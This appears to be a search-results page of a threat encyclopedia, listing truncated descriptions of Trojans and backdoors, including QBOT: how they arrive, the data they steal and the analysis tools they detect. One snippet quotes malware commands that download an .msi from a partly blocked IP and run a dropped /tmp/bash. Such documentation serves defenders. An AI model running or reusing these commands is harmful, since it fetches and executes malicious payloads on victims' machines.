Search
Keyword: os2
device: simcard country language os version device name device id installed apps android id email address It also steals the following information from the affected device: manufacturer source simcard
Time VM Status(if running in Virtual Machine) PE Mode DEP Mode Is Administrator Adware Filename Check sum of Executable Os Version Service Pack OS Language Is 64 bit Is Proxy Is Vpn (Virtual Private
gathers the following data: User Name Computer Name IP Address OS Name OS Version Platform OS Version Processor Name Amount of Physical Memory Video Card Name Video Card Memory Screenshots Username and
Wireshark.exe procexp.exe ProcessHacker.exe PCHunter32.exe JoeTrace.exe ResourceHacker.exe Information Theft This Trojan Spy gathers the following data: Username System Information OS Name and Version Hostname
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
information: Proxy address for the Man-in-the-middle attack List of strings related to banking/bitcoin It gathers the following data: Computer Name Host Name Public IP Address OS Version User Name OS platform
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It executes commands from a remote malicious user,
This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This backdoor arrives on a system as a
address for the Man-in-the-middle attack List of strings related to banking/bitcoin It gathers the following data: Computer Name Host Name Public IP Address OS Version User Name OS platform Installed
User Name domain - Domain is_admin - (YES/NO) os - OS Version qbot_version - QBOT Version install_time - Install Time exe - Execution Name and Path prod_id - ID It terminates itself if the following DLL
family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It executes then deletes itself afterward. It connects
\CurrentVersion\Policies\ Explorer\Run Internet Explorer = "%User Profile%\InternetExplorer.lnk" - If OS version is lower than Windows Vista HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies
{BLOCKED}.216.148:80/ss64.msi -> If OS is found as Windows cmd.exe /c pinc -n 2 127.0.0.1 -> if OS is found as Windows bash -c chmod +x /tmp/bash ; setsid /tmp/bash -> If OS is found as Linux bash -c sleep 3
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a